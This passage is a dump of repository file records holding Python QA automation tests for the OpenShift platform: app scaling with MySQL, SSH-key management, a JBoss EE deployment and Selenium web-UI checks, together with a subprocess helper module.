\"\n \" && sed -i -e 's/#dbname/%s/g' mysql.jsp \"\n \" && sed -i -e 's/#user/%s/g' mysql.jsp \"\n \" && sed -i -e 's/#passwd/%s/g' mysql.jsp \"\n \" && git add . \"\n \" && git commit -amt \"\n \" && git push\") % (self.git_repo, \n OpenShiftTest.WORK_DIR, \n OpenShiftTest.WORK_DIR, \n self.mysql_host, \n self.mysql_port, \n self.mysql_dbname, \n self.mysql_user, \n self.mysql_passwd)\n elif self.test_variant in ('perl'):\n cmd = (\"cd '%s/perl/' \"\n \" && cp -f '%s/../cartridge/app_template/bigdata/mysql/mysql.pl' . \"\n \" && sed -i -e 's/#host/%s/g' mysql.pl && sed -i -e 's/#port/%s/g' mysql.pl \"\n \" && sed -i -e 's/#dbname/%s/g' mysql.pl \"\n \" && sed -i -e 's/#user/%s/g' mysql.pl \"\n \" && sed -i -e 's/#passwd/%s/g' mysql.pl \"\n \" && git add . \"\n \" && git commit -amt \"\n \" && git push\") % (self.git_repo, \n OpenShiftTest.WORK_DIR, \n self.mysql_host, \n self.mysql_port, \n self.mysql_dbname, \n self.mysql_user, \n self.mysql_passwd)\n elif self.test_variant in ('python'):\n cmd = (\"cd '%s/wsgi/' \"\n \" && cp -f '%s/../cartridge/app_template/bigdata/mysql/application' . \"\n \" && sed -i -e 's/#host/%s/g' application \"\n \" && sed -i -e 's/#port/%s/g' application \"\n \" && sed -i -e 's/#dbname/%s/g' application \"\n \" && sed -i -e 's/#user/%s/g' application \"\n \" && sed -i -e 's/#passwd/%s/g' application \"\n \" && git add . \"\n \" && git commit -amt \"\n \" && git push\") % (self.git_repo, \n OpenShiftTest.WORK_DIR, \n self.mysql_host, \n self.mysql_port, \n self.mysql_dbname, \n self.mysql_user, \n self.mysql_passwd)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n cmd = (\"cd '%s/' \"\n \" && cp -f %s/../cartridge/app_template/bigdata/mysql/{config.ru,Gemfile} . \"\n \" ; bundle check ; bundle install \"\n \" ; sed -i -e 's/#host/%s/g' config.ru \"\n \" && sed -i -e 's/#port/%s/g' config.ru \"\n \" && sed -i -e 's/#dbname/%s/g' config.ru \"\n \" && sed -i -e 's/#user/%s/g' config.ru \"\n \" && sed -i -e 's/#passwd/%s/g' config.ru \"\n \" && git add . \"\n \" && git commit -amt \"\n \" && git push\")% (self.git_repo, \n OpenShiftTest.WORK_DIR, \n self.mysql_host, \n self.mysql_port, \n self.mysql_dbname, \n self.mysql_user, \n self.mysql_passwd)\n (ret, output) = common.command_getstatusoutput(cmd)\n self.assert_equal(ret, 0, \"Failed to copy sample app to local git repo and git push\")\n\n\n ret = common.inject_app_index_with_env(self.app_name, self.app_type)\n self.assert_equal(ret, 0, \"Failed to inject app by ENV page\")\n\n self.step((\"Access the 'insert' page to insert a large amount \"\n \"of records into the mysql database\"))\n\n time.sleep(8)\n\n app_url=OSConf.get_app_url(self.app_name)\n if self.test_variant in ('php'):\n url = \"%s/mysql.php?action=insert&size=%s\" % (app_url, \n self.record_count)\n elif self.test_variant in ('jbossas', 'jbosseap', 'jbossews'):\n url = \"%s/mysql.jsp?action=insert&size=%s\" % (app_url, \n self.record_count)\n elif self.test_variant in ('perl'):\n url = \"%s/mysql.pl?action=insert&size=%s\" % (app_url, \n self.record_count)\n elif self.test_variant in ('python'):\n url = \"%s/insert?size=%s\" % (app_url, self.record_count)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n url = \"%s/mysql?action=insert&size=%s\" % (app_url, \n self.record_count)\n\n cmd = 'curl -H \"Pragma:no-cache\" -L \"%s\"' % (url)\n ret = common.command_get_status(cmd)\n\n time.sleep(4)\n\n self.step(\"Check mysql data exists\")\n if self.test_variant in ('php'):\n url = \"%s/mysql.php?action=show\" % (app_url)\n elif self.test_variant in ('jbossas', 'jbosseap', 'jbossews'):\n url = \"%s/mysql.jsp?action=show\" % (app_url)\n elif self.test_variant in ('perl'):\n url = \"%s/mysql.pl?action=show\" % (app_url)\n elif self.test_variant in ('python'):\n url = \"%s/show\" % (app_url)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n url = \"%s/mysql?action=show\" % (app_url)\n ret = common.grep_web_page(url, \n [\"There are %s records in database\" % (self.record_count), \n (\"This is testing data for testing \"\n \"snapshoting and restoring big data\"\n \" in mysql database\")],\n '-H \"Pragma:no-cache\" -L', 5, 6, True)\n self.assert_equal(ret, 0, \"The MySQL data doesn't exist\")\n\n self.step(\"Scale up the app\")\n ret = common.scale_up(self.app_name, self.domain_name)\n self.assert_equal(ret, 0, \"Failed to scale up the app\")\n\n self.step(\"Verify scale up\")\n #gear_lst = self.verify_scale_up(url)\n gear_num = common.get_num_of_gears_by_web(self.app_name, self.app_type)\n self.assert_equal(gear_num, 2, \"Unable to verify scale up\")\n #self.assert_equal(len(gear_lst), 2, \n # \"Failed to veryfy scale up. %d gears found\" % (len(gear_lst)))\n\n self.step(\"Alter domain name\")\n ret = common.alter_domain(self.new_domain_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to alter domain\")\n\n time.sleep(10)\n\n self.step(\"Modify domain name in program\")\n if self.test_variant in ('php'):\n cmd = (\"sed -i -e 's/-%s/-%s/g' %s/php/mysql.php \"\n \"%s/.git/config\") % (self.domain_name, \n self.new_domain_name, \n self.git_repo, \n self.git_repo)\n elif self.test_variant in ('jbossas', 'jbosseap', 'jbossews'):\n cmd = (\"sed -i -e 's/-%s/-%s/g' %s/src/main/webapp/mysql.jsp \"\n \" %s/.git/config\") % (self.domain_name, \n self.new_domain_name, \n self.git_repo, \n self.git_repo)\n elif self.test_variant in ('perl'):\n cmd = (\"sed -i -e 's/-%s/-%s/g' %s/perl/mysql.pl \"\n \" %s/.git/config\") % (self.domain_name, \n self.new_domain_name, \n self.git_repo, \n self.git_repo)\n elif self.test_variant in ('python'):\n cmd = (\"sed -i -e 's/-%s/-%s/g' %s/wsgi/application \"\n \" %s/.git/config\") % (self.domain_name, \n self.new_domain_name, \n self.git_repo, \n self.git_repo)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n cmd = (\"sed -i -e 's/-%s/-%s/g' \"\n \" %s/config.ru %s/.git/config\") % (self.domain_name, \n self.new_domain_name, \n self.git_repo, \n self.git_repo)\n cmd += \" && cd %s && git commit -amt && git push\" % (self.git_repo)\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to change the domain name in program\")\n\n self.step((\"Verify all gears(including mysql) works \"\n \"properly after altering domain\"))\n app_url = OSConf.get_app_url(self.app_name)\n if self.test_variant in ('php'):\n url = \"%s/mysql.php?action=show\" % (app_url)\n elif self.test_variant in ('jbossas', 'jbosseap'):\n url = \"%s/mysql.jsp?action=show\" % (app_url)\n elif self.test_variant in ('perl'):\n url = \"%s/mysql.pl?action=show\" % (app_url)\n elif self.test_variant in ('python'):\n url = \"%s/show\" % (app_url)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n url = \"%s/mysql?action=show\" % (app_url)\n ret = common.grep_web_page(url,\n [\"There are %s records in database\" % (self.record_count),\n (\"This is testing data for testing \"\n \"snapshoting and restoring big data\"\n \" in mysql database\")],\n '-H \"Pragma:no-cache\" -L', 5, 6, True)\n self.assert_equal(ret, 0, \"The MySQL data doesn't exist\")\n #gear_lst = self.verify_scale_up(url)\n #self.assert_equal(len(gear_lst), 2, \"Failed to veryfy scale up. %d gears found\" % (len(gear_lst)))\n gear_num = common.get_num_of_gears_by_web(self.app_name, self.app_type)\n self.assert_equal(gear_num, 2, \"Unable to verify scale up\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n ''' Used common function instead!\n def verify_scale_up(self, url, retry_times=10):\n gear_lst = []\n cmd = \"curl -H 'Pragma: no-cache' -L '%s'\" % (url)\n for i in range(retry_times):\n (ret, output) = common.command_getstatusoutput(cmd, quiet=True)\n if ret != 0:\n time.sleep(3)\n else:\n pattern = re.compile(r'(?<=Gear DNS: ).+com', re.M)\n match = pattern.search(output)\n if match == None:\n time.sleep(3)\n elif match.group(0) not in gear_lst and output.find(\"There are %s records in database\" % (self.record_count)) != -1:\n gear_lst.append(match.group(0))\n self.debug(\"Gears found: \" + ' '.join(gear_lst))\n return gear_lst\n '''\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ScalingAfterAlterDomain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7384868264198303, "alphanum_fraction": 0.7401315569877625, "avg_line_length": 27.952381134033203, "blob_id": "c6b03d81ee8c424477bed0a50bae04ad5c40c758", "content_id": "6b545a01f89a6a2eb7daac4c1224dcbbf89a277b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 608, "license_type": "no_license", "max_line_length": 64, "num_lines": 21, "path": "/automation/iframehandle.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import time\nfrom selenium import webdriver\n\n\nbase_url = \"https://maitai.app.qa.eng.nay.redhat.com/\" \n\n\ndriver = webdriver.Firefox()\ndriver.get(base_url)\n\ndriver.find_element_by_id(\"username\").send_keys(\"xgao\")\ndriver.find_element_by_id(\"password\").send_keys(\"redhat\")\ndriver.find_element_by_id(\"password\").submit()\n\ndriver.find_element_by_link_text(\"Start Process\").click()\ndriver.find_element_by_link_text(\"Simple demo process\").click()\n\ndriver.switch_to_frame('form_view')\ntime.sleep(5)\ndriver.find_element_by_id(\"description\").send_keys(\"xgao test so so\")\ndriver.find_element_by_id(\"description\").submit()\n" }, { "alpha_fraction": 0.6624242663383484, "alphanum_fraction": 0.6745454668998718, "avg_line_length": 40.25, "blob_id": "11f88c0ee92bd614316fc6f7546271395597a628", "content_id": "638587cb319d53d37d333787b252287c8f329e3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1650, "license_type": "no_license", "max_line_length": 144, "num_lines": 40, "path": "/automation/open/testmodules/UI/web/US1797_135713.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport HTMLTestRunner\n\nclass US1797135713(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n\n def test_u_s1797135713(self):\n driver = self.driver\n baseutils.login(self,self.cfg.new_user,self.cfg.password)\n baseutils.go_to_account_page(self)\n driver.find_element_by_link_text(\"Change password...\").click()\n driver.find_element_by_id(\"web_user_old_password\").clear()\n driver.find_element_by_id(\"web_user_old_password\").send_keys(\"ewqewqewq\")\n driver.find_element_by_id(\"web_user_password\").clear()\n driver.find_element_by_id(\"web_user_password\").send_keys(\"qweqweqwe\")\n driver.find_element_by_id(\"web_user_password_confirmation\").clear()\n driver.find_element_by_id(\"web_user_password_confirmation\").send_keys(\"asdasdasdasd\\t\")\n baseutils.assert_text_equal_by_xpath(self, \"Please enter the same value again.\",\"//*[@id='web_user_password_confirmation_input']/div/p\")\n \n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5219137072563171, "alphanum_fraction": 0.5304449796676636, "avg_line_length": 32.58427047729492, "blob_id": "842f7f73c4078fc483b25dfaa9b71a6f1c5573c9", "content_id": "1f3afea85a498ed176e800e531b94be7c15f8ca3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5978, "license_type": "no_license", "max_line_length": 138, "num_lines": 178, "path": "/automation/open/lib/proc.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os,sys,re,time,subprocess,select,fcntl,signal\nimport Queue\nimport threading\nimport signal\nimport datetime\n\nclass Proc(object):\n def __init__(self, cmd, shell=True, stdin=subprocess.PIPE):\n self.cmd = cmd\n self.output = []\n self.lastoutput = []\n self.input = []\n self.proc = subprocess.Popen(cmd, stdin=stdin, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=0, shell=shell)\n #preexec_fn=os.setsid\n def __read_output__(self, timeout=1):\n outfds, infds, errfds = select.select([self.proc.stdout], [], [], timeout)\n if len(outfds) != 0:\n flags = fcntl.fcntl(outfds[0], fcntl.F_GETFL, 0)\n fcntl.fcntl(outfds[0], fcntl.F_SETFL, flags | os.O_NONBLOCK)\n s = outfds[0].read()\n if s != '':\n self.lastoutput.append(s)\n self.output.append(s)\n return 0\n else:\n return 1\n else:\n return 1\n\n def __write_input__(self, input_data, timeout=1):\n outfds, infds, errfds = select.select([], [self.proc.stdin], [], timeout)\n if len(infds) != 0:\n flags = fcntl.fcntl(infds[0], fcntl.F_GETFL, 0)\n fcntl.fcntl(infds[0], fcntl.F_SETFL, flags | os.O_NONBLOCK)\n infds[0].write(input_data)\n return 0\n else:\n return 1\n\n def input_cmd(self, cmd, timeout=3):\n self.input.append(cmd)\n print \"\\nCommand: \", cmd\n return self.__write_input__(cmd, timeout)\n\n def kill(self, sig=signal.SIGTERM):\n self.proc.send_signal(sig)\n if sig == signal.SIGTERM or sig == signal.SIGKILL:\n time.sleep(1)\n if self.proc.poll() == None:\n return 1\n else:\n return 0\n return 0\n\n def wait(self, delay=2, count=5):\n '''Wait delay*count seconds for process to finish'''\n while count > 0:\n count -= 1\n retcode = self.proc.poll()\n if retcode != None:\n return retcode\n time.sleep(delay)\n return None\n\n def grep_output(self, regex, delay=3, count=5, flag=re.S, show_output=True):\n pattern = re.compile(regex)\n ret = 1\n while count > 0:\n count -= 1\n self.__read_output__(delay)\n match_lst = pattern.findall(''.join(self.output), flag)\n if match_lst != []:\n ret = 0\n print \"According to regex '%s', found %s\" % (regex, match_lst)\n break\n time.sleep(delay)\n if ret == 1:\n print \"Regex '%s' didn't match any string in the output\" % (regex)\n if show_output == True:\n self.print_lastoutput()\n return ret\n\n def get_full_output(self, delay=3, count=5):\n retry = count\n while count > 0:\n count -= 1\n if self.__read_output__(1) == 0:\n count = retry\n time.sleep(delay)\n return ''.join(self.output)\n\n def print_lastoutput(self, timeout=1):\n self.__read_output__(timeout)\n print '<***********last output of the proc************>'\n sys.stdout.write(''.join(self.lastoutput))\n print '<*************end of last output***************>'\n self.lastoutput = []\n\n def print_output(self, timeout=1):\n self.__read_output__(timeout)\n print '<***********full output of the proc************>'\n sys.stdout.write(''.join(self.output))\n print '<*************end of full output***************>'\n\n\nclass AsynchronousFileReader(threading.Thread):\n def __init__(self, fd, queue, quiet=False):\n threading.Thread.__init__(self)\n self.daemon = True\n self._fd = fd\n self._queue = queue\n self._stop = False\n self._quiet = quiet\n\n def stop(self):\n self._stop = True\n\n def run(self):\n for line in iter(self._fd.readline, ''):\n if not self._quiet:\n sys.stdout.write(line)\n self._queue.put(line, timeout=3)\n if self._stop == True:\n self._fd.close()\n return\n\n def eof(self):\n return not self.is_alive() and self._queue.empty()\n\nclass ProcNonBlock(object):\n def __init__(self, cmd, quiet=False):\n if not quiet:\n print \"\\nCommand: %s\" % (cmd)\n self.cmd = cmd\n self._output = []\n self._queue = Queue.Queue()\n self._proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=0, shell=True)\n self._reader = AsynchronousFileReader(self._proc.stdout, self._queue, quiet)\n self._reader.start()\n\n def __del__(self):\n try:\n self.kill()\n except OSError:\n pass\n\n def kill(self, sig=signal.SIGKILL):\n self._reader.stop()\n self._proc.terminate()\n\n def poll(self):\n return self._proc.poll()\n\n def wait(self, timeout=None):\n begin_time = datetime.datetime.now()\n if timeout == None:\n self._proc.wait()\n return self._proc.poll()\n while self._proc.poll() == None and (datetime.datetime.now() - begin_time).seconds < timeout:\n time.sleep(1)\n return self._proc.poll()\n\n # If no new output generated within 10 secs, kill the subprocess\n def wait_output(self, timeout=10):\n begin_time = datetime.datetime.now()\n prev_size = self._queue.qsize()\n while (datetime.datetime.now() - begin_time).seconds < timeout:\n time.sleep(1)\n cur_size = self._queue.qsize()\n if cur_size != prev_size:\n begin_time = datetime.datetime.now()\n prev_size = cur_size\n\n def output(self):\n while not self._queue.empty():\n self._output.append(self._queue.get(timeout=3))\n return ''.join(self._output)\n" }, { "alpha_fraction": 0.6288859844207764, "alphanum_fraction": 0.6379533410072327, "avg_line_length": 32.20429992675781, "blob_id": "9fb3d21902b3951d727461473bc7e5c607f89d21", "content_id": "000b715c0055e7b39f9e25a44097f78486216fe2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3088, "license_type": "no_license", "max_line_length": 152, "num_lines": 93, "path": "/automation/open/testmodules/RT/client/add_sshkey.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n\tself.domain_name = common.get_domain_name()\n\tself.key_filename=\"my_testing_second_key\"\n\tself.new_keyname=\"second\"\n tcms_testcase_id=129190\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass AddSshKey(OpenShiftTest):\n def cleanup(self):\n os.system(\"rm -f %s*\" % (self.key_filename))\n common.remove_sshkey(self.new_keyname, self.user_email, self.user_passwd)\n\n def test_method(self):\n\tself.steps_list.append(testcase.TestCaseStep(\"Just for sure from previus testing... - remove that key file\",\n \"rm -f %s*\" % (self.key_filename)))\n\n self.steps_list.append(testcase.TestCaseStep(\"Just for sure from previus testing... - remove that key\",\n common.remove_sshkey,\n function_parameters=[self.new_keyname, self.user_email, self.user_passwd],\n ))\n\n \tself.steps_list.append(testcase.TestCaseStep(\"Create a ssh key\" ,\n \"ssh-keygen -t dsa -f %s -N '' \"% self.key_filename,\n expect_return=0))\n\n \tself.steps_list.append(testcase.TestCaseStep(\"Add this key to openshift\" ,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % self.key_filename, self.new_keyname],\n expect_return=0))\n\n \tself.steps_list.append(testcase.TestCaseStep(\"Check the presence of the key in the list\",\n \"rhc sshkey list -l %s -p '%s' %s | grep -i '%s' \"%(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS, self.new_keyname),\n expect_return=0))\n\n# [US1652][UI][CLI] Multi key management rhc-user-info\n# https://tcms.engineering.redhat.com/case/129190/?from_plan=4962\n#\n \tself.steps_list.append(testcase.TestCaseStep(\"Check the presence of the key in the list\",\n \"rhc sshkey list -l %s -p '%s' %s\"%(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list = [\"%s\"% self.new_keyname],\n expect_return=0))\n\n\n##################################################################\n \tcase = testcase.TestCase(\"[US1652][UI][CLI] Call multi-key management CLI to add a ssh key with valid key-name\",\n steps=self.steps_list)\n\n \tcase.add_clean_up(self.cleanup)\n \tcase.run()\n\n\t\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddSshKey)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5709639191627502, "alphanum_fraction": 0.584269642829895, "avg_line_length": 32.48514938354492, "blob_id": "efd03eee960e2a0b4ec0853cb056f25e77569ea8", "content_id": "f48b0fea01c95214317ae1240013c1c96b3d178f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3382, "license_type": "no_license", "max_line_length": 129, "num_lines": 101, "path": "/automation/open/testmodules/RT/cartridge/jbossas_java_ee.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nAug 2, 2012\n\"\"\"\nimport rhtest\nimport common\nimport OSConf\nimport os\nimport pycurl\nfrom shutil import rmtree\nfrom time import sleep\n\nclass JBossJavaEETest(rhtest.Test):\n\n def initialize(self):\n self.application_name = common.getRandomString()\n self.git_repo = './%s' % self.application_name\n self.summary = '[US2296][Runtime][rhc-cartridge] EE6 application with JNDI, remote EJBs, and JMS [P1]'\n common.env_setup()\n\n def finalize(self):\n rmtree(self.git_repo)\n \n def test_method(self):\n self.info('=' * 80)\n self.info('Creating the application')\n self.info('=' * 80)\n ret = common.create_app(\n self.application_name,\n common.app_types['jbossas'],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd\n )\n self.assert_equal(ret, 0, \"Failed to create app\")\n\n self.info('=' * 80)\n self.info('Deploying the application')\n self.info('=' * 80)\n deployment_steps = [\n 'cp -v %s %s' % ( os.path.dirname(__file__) + '/app_template/sfsbTest-1.0.war', self.git_repo + '/deployments' ),\n 'cd %s' % self.git_repo,\n 'git add .',\n 'git commit -a -m \"Adding testing app\"',\n 'git push'\n ]\n common.command_get_status(' && '.join(deployment_steps))\n self.info('Waiting for the application...')\n sleep(60)\n\n self.info('=' * 80)\n self.info('Invoking testing servlet')\n self.info('=' * 80)\n curl = pycurl.Curl()\n curl.setopt(pycurl.URL, 'http://' + OSConf.get_app_url(self.application_name) + '/sfsbTest-1.0/SfsbServlet')\n curl.setopt(pycurl.VERBOSE, 1)\n curl.perform()\n self.info('Asserting that the return code is 200')\n self.assert_equal(curl.getinfo(pycurl.HTTP_CODE), 200)\n\n self.info('=' * 80)\n self.info('Verifying server.log')\n self.info('=' * 80)\n ( ret_code, ret_output ) = common.run_remote_cmd(self.application_name, 'cat %s/logs/server.log' % self.application_name)\n pattern_list = [\n 'java:module/EntityTesterBean',\n 'java:module/StatelessBean1!org.jboss.jndiTest.StatelessBean1Local',\n 'Received new cluster view',\n 'MBeans were successfully registered to the platform mbean server',\n 'Started repl cache from ejb container',\n 'Added a new EJB receiver in cluster context ejb for node',\n 'Stateless called',\n 'JMS message sent',\n ]\n missing_pattern = [ ]\n for pattern in pattern_list:\n result = 'OK'\n if ret_output.find(pattern) == -1:\n missing_pattern.append(pattern)\n result = 'FAIL'\n self.info(\"Looking for pattern '%s'... %s\" % ( pattern, result ))\n self.info('Asserting that all the patterns are found...')\n self.assert_equal(len(missing_pattern), 0)\n \n # Everything is OK\n return self.passed(self.summary)\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JBossJavaEETest)\n #### user can add multiple sub tests here.\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5941907167434692, "alphanum_fraction": 0.6178643107414246, "avg_line_length": 43.774436950683594, "blob_id": "881b17e064ef55f516415faa1f86b99c8de061a8", "content_id": "fa2c30d3f0db45d3ef652bfc1dd836f3719c9547", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5956, "license_type": "no_license", "max_line_length": 273, "num_lines": 133, "path": "/automation/open/testmodules/UI/web/case_165704.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_165704.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckGetInvolvedPage(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n \n #check with invalid password\n #web.go_to_home()\n web.go_to_community()\n web.click_element_by_xpath('''//a[contains(@href, '/community/get-involved')]''')\n time.sleep(2)\n\n #check the \"OpenShift\" link \n web.assert_text_equal_by_xpath(\"OpenShift\",'''//div[@id='node-9465']/div/p[2]/a''')\n web.click_element_by_link_text(\"OpenShift\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''OpenShift is Red Hat's free, auto-scaling Platform as a Service (PaaS) for applications. As an application platform in the cloud, OpenShift manages the stack so you can focus on your code.''','''//body/header/nav/div[2]/div/h2''') \n web.go_back() \n #check the \" OpenShift Origin LiveCD\" link \n web.assert_text_equal_by_xpath(\"OpenShift Origin LiveCD\",'''//div[@id='node-9465']/div/p[2]/a[2]''')\n web.click_element_by_link_text(\"OpenShift Origin LiveCD\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''OpenShift Origin Source Code''','''//div[@id='content']/div/div/div/div/div/h1''') \n web.go_back()\n #check the \" examples and quickstarts.\" link \n web.assert_text_equal_by_xpath(\"examples and quickstarts\",'''//div[@id='node-9465']/div/p[3]/a''')\n web.click_element_by_link_text(\"examples and quickstarts\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Get Started on OpenShift''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"DIY application \" link \n web.assert_text_equal_by_xpath(\"DIY application\",'''//div[@id='node-9465']/div/p[4]/a''')\n web.click_element_by_link_text(\"DIY application\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''A PaaS that runs anything HTTP: Getting Started with DIY Applications on OpenShift''','''//div[@id='content']/div/div/div/div[3]/div/section/article/h1''') \n web.go_back() \n #check the \" Tweet \" ,\"Facebook\" and \" Google+.\" link \n web.assert_text_equal_by_xpath(\"Tweet\",'''////a[contains(@href, 'https://twitter.com/#!/openshift')]''')\n web.assert_text_equal_by_xpath(\"Facebook\",'''//a[contains(@href, 'https://www.facebook.com/openshift')]''')\n web.assert_text_equal_by_xpath(\"Google+\",'''//a[contains(@href, 'https://plus.google.com/108052331678796731786/posts')]''')\n\n #check the \"forums\" link \n web.assert_text_equal_by_xpath(\"forums\",'''//div[@id='node-9465']/div/p[6]/a''')\n web.click_element_by_link_text(\"forums\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Forums''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back() \n #check the \"IRC \" link \n web.assert_text_equal_by_xpath(\"IRC\",'''//div[@id='node-9465']/div/p[6]/a[2]''')\n web.click_element_by_link_text(\"IRC\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Connect to freenode IRC''','''//body/div/div[2]/table/tbody/tr/td/table/tbody/tr/td/h1''') \n web.go_back() \n\n\n\n #check the \"report bugs\" link \n web.assert_text_equal_by_xpath(\"report bugs\",'''//div[@id='node-9465']/div/p[7]/a''')\n web.assert_text_equal_by_xpath(\"report bugs\",'''//a[contains(@href, 'https://bugzilla.redhat.com/enter_bug.cgi?product=OpenShift')]''')\n web.go_back() \n #check the \"suggest or vote on new features\" link \n web.assert_text_equal_by_xpath(\"suggest or vote on new features\",'''//div[@id='node-9465']/div/p[7]/a[2]''')\n web.click_element_by_link_text(\"suggest or vote on new features\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Vote on Features''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back() \n #check the \"fix bugs\" link \n web.assert_text_equal_by_xpath(\"fix bugs\",'''//div[@id='node-9465']/div/p[8]/a''')\n web.assert_text_equal_by_xpath(\"fix bugs\",'''//a[contains(@href, 'https://bugzilla.redhat.com/buglist.cgi?query_format=specific&order=relevance+desc&bug_status=__open__&product=OpenShift')]''')\n #check the \"contribute patches\" link \n web.assert_text_equal_by_xpath(\"contribute patches\",'''//div[@id='node-9465']/div/p[8]/a[2]''')\n web.click_element_by_link_text(\"contribute patches\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''GitHub workflow for submitting pull requests''','''//div[@id='content']/div/div/div/div[3]/div/section/div[2]/h2''') \n web.go_back() \n #check the \" write sample applications and quickstarts \" link \n web.assert_text_equal_by_xpath(\"write sample applications and quickstarts\",'''//div[@id='node-9465']/div/p[9]/a''')\n web.click_element_by_link_text(\"write sample applications and quickstarts\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''How to create an OpenShift github quick start project''','''//div[@id='content']/div/div/div/div[3]/div/section/article/h1''') \n web.go_back() \n\n \n\n \n\n\n\n\n self.tearDown()\n\n return self.passed(\" case_165704--CheckGetInvolvedPage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckGetInvolvedPage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_165704.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5659125447273254, "alphanum_fraction": 0.5752639770507812, "avg_line_length": 29.685184478759766, "blob_id": "5b97a14cef03a9f89e357a76962d6d2b88e70bfb", "content_id": "3c45cd7f74e881ac8fd2b8cdeb8ad11e58426e99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3315, "license_type": "no_license", "max_line_length": 115, "num_lines": 108, "path": 